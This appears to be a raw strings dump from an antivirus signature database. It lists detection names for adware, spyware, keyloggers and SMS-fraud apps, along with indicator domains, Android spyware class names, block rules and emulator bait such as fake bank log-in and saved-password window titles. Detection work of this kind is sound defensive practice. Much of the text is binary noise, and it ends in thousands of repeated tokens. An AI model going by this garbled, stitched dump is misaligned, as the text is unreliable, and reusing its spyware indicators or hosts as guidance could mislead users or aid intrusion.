!Vundo.IT !SmallVB !Slenfbot.AEM !Renos.CW !Tring.A MisleadingAd:Linux/ZkarletFlash MisleadingAd:MacOS/ZkarletFlash MisleadingAd:Perl/ZkarletFlash MisleadingAd:Python/ZkarletFlash MisleadingAd:Python/ZkarletFlash MisleadingAd:Script/ZkarletFlash MisleadingAd:Script/ZkarletFlash MisleadingAd:Unix/ZkarletFlash MisleadingAd:iPhoneOS/ZkarletFlash \"MisleadingAd:iPhoneOS/ZkarletFlash MisleadingAd:Win32/ZkarletFlash Program:AndroidOS/ZkarletFlash Program:FreeBSD/ZkarletFlash Program:Linux/ZkarletFlash Program:MacOS/ZkarletFlash Program:Perl/ZkarletFlash Program:Python/ZkarletFlash Program:Script/ZkarletFlash Program:Unix/ZkarletFlash Program:iPhoneOS/ZkarletFlash Program:Win32/ZkarletFlash PUA:AndroidOS/ZkarletPlush PUA:FreeBSD/ZkarletPlush PUA:Linux/ZkarletPlush PUA:MacOS/ZkarletPlush PUA:Perl/ZkarletPlush PUA:Python/ZkarletPlush PUA:Script/ZkarletPlush PUA:Unix/ZkarletPlush PUA:iPhoneOS/ZkarletPlush PUA:Win32/ZkarletPlush Adware:AndroidOS/ImpulZe ImpulZe Adware:Perl/ImpulZe Adware:Python/ImpulZe Adware:Script/ImpulZe Adware:Unix/ImpulZe Adware:iPhoneOS/ImpulZe !ImpulZe BrowserModifier:AndroidOS/ImpulZe !BrowserModifier:AndroidOS/ImpulZe BrowserModifier:FreeBSD/ImpulZe BrowserModifier:Linux/ImpulZe BrowserModifier:MacOS/ImpulZe BrowserModifier:Perl/ImpulZe BrowserModifier:Python/ImpulZe BrowserModifier:Script/ImpulZe BrowserModifier:Unix/ImpulZe BrowserModifier:iPhoneOS/ImpulZe BrowserModifier:iPhoneOS/ImpulZe BrowserModifier:Win32/ImpulZe MonitoringTool:AndroidOS/ImpulZe MonitoringTool:AndroidOS/ImpulZe MonitoringTool:FreeBSD/ImpulZe MonitoringTool:Linux/ImpulZe MonitoringTool:MacOS/ImpulZe MonitoringTool:Perl/ImpulZe MonitoringTool:Python/ImpulZe MonitoringTool:Script/ImpulZe MonitoringTool:Unix/ImpulZe MonitoringTool:iPhoneOS/ImpulZe MonitoringTool:Win32/ImpulZe RemoteAccess:AndroidOS/ImpulZe RemoteAccess:FreeBSD/ImpulZe RemoteAccess:Linux/ImpulZe RemoteAccess:MacOS/ImpulZe RemoteAccess:Perl/ImpulZe RemoteAccess:Python/ImpulZe RemoteAccess:Script/ImpulZe RemoteAccess:Unix/ImpulZe RemoteAccess:iPhoneOS/ImpulZe RemoteAccess:Win32/ImpulZe Rogue:AndroidOS/ImpulZe Rogue:FreeBSD/ImpulZe Rogue:Linux/ImpulZe Rogue:MacOS/ImpulZe Rogue:Perl/ImpulZe Rogue:Python/ImpulZe Rogue:Script/ImpulZe Rogue:Unix/ImpulZe Rogue:iPhoneOS/ImpulZe Rogue:Win32/ImpulZe SettingsModifier:AndroidOS/ImpulZe \"SettingsModifier:AndroidOS/ImpulZe SettingsModifier:FreeBSD/ImpulZe SettingsModifier:FreeBSD/ImpulZe SettingsModifier:Linux/ImpulZe SettingsModifier:MacOS/ImpulZe SettingsModifier:Perl/ImpulZe SettingsModifier:Python/ImpulZe SettingsModifier:Script/ImpulZe SettingsModifier:Unix/ImpulZe SettingsModifier:iPhoneOS/ImpulZe !SettingsModifier:iPhoneOS/ImpulZe SettingsModifier:Win32/ImpulZe SoftwareBundler:AndroidOS/ImpulZe !SoftwareBundler:AndroidOS/ImpulZe SoftwareBundler:FreeBSD/ImpulZe SoftwareBundler:Linux/ImpulZe SoftwareBundler:MacOS/ImpulZe SoftwareBundler:Perl/ImpulZe SoftwareBundler:Python/ImpulZe SoftwareBundler:Script/ImpulZe SoftwareBundler:Unix/ImpulZe SoftwareBundler:iPhoneOS/ImpulZe SoftwareBundler:iPhoneOS/ImpulZe SoftwareBundler:Win32/ImpulZe Spyware:AndroidOS/ImpulZe Spyware:Perl/ImpulZe Spyware:Python/ImpulZe Spyware:Script/ImpulZe Spyware:Unix/ImpulZe Spyware:iPhoneOS/ImpulZe Tool:AndroidOS/ImpulZe Tool:Perl/ImpulZe Tool:Python/ImpulZe Tool:Script/ImpulZe Tool:Unix/ImpulZe Tool:iPhoneOS/ImpulZe Misleading:AndroidOS/ImpulZe Misleading:FreeBSD/ImpulZe Misleading:Linux/ImpulZe Misleading:MacOS/ImpulZe Misleading:Perl/ImpulZe Misleading:Python/ImpulZe Misleading:Script/ImpulZe Misleading:Unix/ImpulZe Misleading:iPhoneOS/ImpulZe Misleading:Win32/ImpulZe MisleadingAd:AndroidOS/ImpulZe MisleadingAd:FreeBSD/ImpulZe MisleadingAd:Linux/ImpulZe MisleadingAd:MacOS/ImpulZe MisleadingAd:Perl/ImpulZe MisleadingAd:Python/ImpulZe MisleadingAd:Script/ImpulZe MisleadingAd:Unix/ImpulZe MisleadingAd:iPhoneOS/ImpulZe MisleadingAd:Win32/ImpulZe Program:AndroidOS/ImpulZe Program:FreeBSD/ImpulZe Program:Linux/ImpulZe Program:MacOS/ImpulZe Program:Perl/ImpulZe Program:Python/ImpulZe Program:Script/ImpulZe Program:Unix/ImpulZe Program:iPhoneOS/ImpulZe Program:Win32/ImpulZe PUA:AndroidOS/InpualZe PUA:FreeBSD/InpualZe PUA:Linux/InpualZe PUA:MacOS/InpualZe PUA:Perl/InpualZe PUA:Python/InpualZe PUA:Script/InpualZe PUA:Unix/InpualZe PUA:iPhoneOS/InpualZe PUA:Win32/InpualZe Misleading:AndroidOS/SmsReg.B!xp Misleading:AndroidOS/SmsReg.B!xp upayapi.piiwan.com .wxapi.WXPayEntryActivity upayapi.upwan.cn unregisterObserver end_Sms_Monitor_Fail www.upay360.cn Misleading:AndroidOS/SmsReg.D!xp Misleading:AndroidOS/SmsReg.D!xp /umpay/huafubao/download mnsp.juzixiangshui.com/? sms2.upay360.com/getMobile.php xq2.1277527.com/0901? ://111.13.47.76:81/open_gate/web_game_fee.php com.upay.pay.upay_sms.service.AlarmService *com.upay.pay.upay_sms.service.AlarmService SmsInitObserver PUA:Win32/IdleBuddy PUA:Block:IdleBuddy&!PUA:Exceptionz &\"PUA:Block:IdleBuddy&!PUA:Exceptionz PUA:MacOS/Spigot.BT!MTB PUA:Block:Spigot.BT1&PUA:Block:Spigot.BT2&!PUA:Exceptionz <8PUA:Block:Spigot.BT1&PUA:Block:Spigot.BT2&!PUA:Exceptionz PUA:AndroidOS/SmsKey.DS!MTB PUA:Block:SmsKey.DS&!PUA:Exceptionz &\"PUA:Block:SmsKey.DS&!PUA:Exceptionz !Webalta!mclg %`,D! !Spector!mclg !Timesink!mclg MonitoringTool:AndroidOS/FreeSpy.DS!MTB 'MonitoringTool:AndroidOS/FreeSpy.DS!MTB BrowserHistoryCollector KeylogStateMonitor ContactObserver CallMonitor SmsMonitor FacebookMessageExtractor FacebookMessageExtractor] !Wintrim!MSR HiveMon!mclg !Techrelinst!mclg +-tE{l !Hiloti!mclg 2Q tP Zbot!mclg !Yobrowser!mclg !Qqpass!mclg ?CM~ E !Weecnaw!mclg !Webdesk!mclg !Antivm!mclg Spyware:AndroidOS/Telerat!mclg PUA:Win32/VkDJ_BundleInstaller PUA:Block:VkDJ_BundleInstaller&!PUA:Exceptionz 1-PUA:Block:VkDJ_BundleInstaller&!PUA:Exceptionz !AgentTesla.RR!MTB Hookey!mclg Oxypumper!mclg :h*/] !Ldpinch!mclg MonitoringTool:Win32/SimpleKeylogger $MonitoringTool:Win32/SimpleKeylogger PUA:Linux/Synscan.A!xp PUA:Block:Synscan.A!xp&!PUA:Exceptionz )%PUA:Block:Synscan.A!xp&!PUA:Exceptionz PUA:Linux/CoinMiner.P!xp PUA:Block:CoinMiner.P!xp&!PUA:Exceptionz +'PUA:Block:CoinMiner.P!xp&!PUA:Exceptionz PUA:AndroidOS/SMSreg.C!MTB PUA:Block:SMSreg.C&!PUA:Exceptionz %!PUA:Block:SMSreg.C&!PUA:Exceptionz MonitoringTool:AndroidOS/NickyRCP.A!MTB 'MonitoringTool:AndroidOS/NickyRCP.A!MTB remote-control-phone sendSMSWait getLastKnownLocation fakeCallerRequest smsmatcher smsmatcher] !Clickspring!mclg !Usteal!mclg !Adpeak!mclg !Yelloader!mclg MonitoringTool:MSIL/PCTattletale MonitoringTool:MSIL/PCTattletale BrowserModifier:Win32/Smudplu!mclg \"BrowserModifier:Win32/Smudplu!mclg Program:AndroidOS/Multiverze PUA:Win32/DStudio PUA:Block:DownloadStudio&!PUA:Exceptionz +'PUA:Block:DownloadStudio&!PUA:Exceptionz !Pigsearch!mclg Spyware:AndroidOS/Androrat!mclg MonitoringTool:Win32/iMonitorsoft !MonitoringTool:Win32/iMonitorsoft PUA:Python/PSWLaZagn.A!MTB PUA:Block:PSWLaZagn.A&!PUA:Exceptionz ($PUA:Block:PSWLaZagn.A&!PUA:Exceptionz PUA:AndroidOS/SMSReg.D!MTB PUA:Block:SMSReg %!PUA:Block:SMSReg ,0A{? quFP* $cUII d/>p8j LT5)q7 nZC3G 5$,ot 3S;HT ~ 8{zYq 9^ph\t X> gROi 2GZFv G ;?> (h5=yl OLx`` lO_d*, M_0(* `Wty* RcK$/ `Hr)H% /h9xY^v Jw\\^B 6'8ODo <o?61_ Y dc:u1 @\t%B5 oT4', *,/TqE u['<k3tYm z9[Z;$ s x<s\tL 'wfodV BtiHe \"nkZP }{e!Y pigh| ${#Bj itRc2 'Dr;( h?snZ JIkRHF BO<Z, vx^D=| ,]\"`$ >gTAg -y&I} -bjkkO! 1d[t+ uQ#D+U ?U~I7Ili >(5)\t CN`tQ ONQn\\ 32`{N $Lb1s Lll~&f| >F``K `,3uT Zl@q\t ImPVa uwyJ! \"^mnC #cCspt 6}\\rC Umr!w 4>FxO8 p9O-P o-*)\t k%di< @S]S= Sfk_N PBOARD PBOARD\t WM_PAINTCLIPBOARD WM_VSCROLLCLIPBOARD WM_SIZECLIPBOARD WM_ASKCBFORMATNAME WM_CHANGECBCHAIN WM_HSCROLLCLIPBOARD WM_QUERYNEWPALETTE WM_PALETTEISCHANGING WM_PALETTECHANGED WM_HOTKEY WM_PRINT WM_PRINTCLIENT WM_APPCOMMAND WM_THEMECHANGED WM_THEMECHANGEDX WM_HANDHELDFIRST WM_HANDHELDFIRST_ WM_HANDHELDLAST WM_HANDHELDLAST` WM_AFXFIRST WM_AFXLAST WM_PENWINFIRST WM_PENWINLAST WM_PENWINLAST$ MSVBVM60 MSVBVM50 MSVBVM events are artifacts RICHEDIT50W Exception in the timer proc C:\\Wallpaper1.bmp VDLL:HMValidateHandleCalled SkypeControlAPI SkypeControlAPIAttach SkypeControlAPIDiscover Armadillo_Mutex ChildControl ScrollBar Dialog PEEMU:VirTool:Win32/Obfuscator_Upatre riched20.dll RichEditANSIWndProc RichEdit MDICLIENT listbox WinSta0 Winsta0 00000409 Cursor Internet Explorer_Server Tibia #32769 ATL:007BF380 YTopWindow Yahoo! Messenger WMPlayerApp Playing MP3 Notepad My saved passwords - Notepad Program Manager tooltips_class32 CityBank log-in Bank of America log-in _Dummy_0x6A_ _Dummy_0x69_ _Dummy_0x68_ _Dummy_0x67_ _Dummy_0x66_ _Dummy_0x65_ _Dummy_0x64_ _Dummy_0x63_ _Dummy_0x62_ _Dummy_0x61_ _Dummy_0x60_ _Dummy_0x5F_ _Dummy_0x5E_ _Dummy_0x5D_ _Dummy_0x5C_ _Dummy_0x5B_ _Dummy_0x5A_ _Dummy_0x59_ _Dummy_0x58_ _Dummy_0x57_ _Dummy_0x56_ _Dummy_0x55_ _Dummy_0x54_ _Dummy_0x53_ _Dummy_0x52_ _Dummy_0x51_ _Dummy_0x50_ _Dummy_0x4F_ _Dummy_0x4E_ _Dummy_0x4D_ _Dummy_0x4C_ _Dummy_0x4B_ _Dummy_0x4A_ _Dummy_0x49_ _Dummy_0x48_ _Dummy_0x47_ _Dummy_0x46_ _Dummy_0x45_ _Dummy_0x44_ _Dummy_0x43_ _Dummy_0x42_ _Dummy_0x41_ _Dummy_0x40_ _Dummy_0x3F_ _Dummy_0x3E_ _Dummy_0x3D_ _Dummy_0x3C_ _Dummy_0x3B_ _Dummy_0x3A_ _Dummy_0x39_ _Dummy_0x38_ _Dummy_0x37_ _Dummy_0x36_ _DummyAA_ _DummyZ_ _DummyW_ _DummyV_ _DummyU_ _DummyT_ _DummyS_ _DummyR_ _DummyQ_ _DummyP_ _DummyO_ _DummyN_ _DummyM_ _DummyL_ _DummyK_ _DummyJ_ _DummyI_ _DummyH_ _DummyG_ _DummyF_ _DummyE_ _DummyD_ _DummyC_ _DummyB_ _DummyA_ _Dummy9_ _Dummy_x1c_ _Dummy7_ _Dummy6_ _Dummy5_ _Dummy4_ _Dummy3_ _Dummy2_ _Dummy_ MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\\Wallpaper1.bmp2 :|:1 11EditButtonVDLL:HMValidateHandleCalledC:\\C:\\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_ N~PA~ \"SA~RSDS_ user32.pdb user32.pdbHO mpositij mpositijj $SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~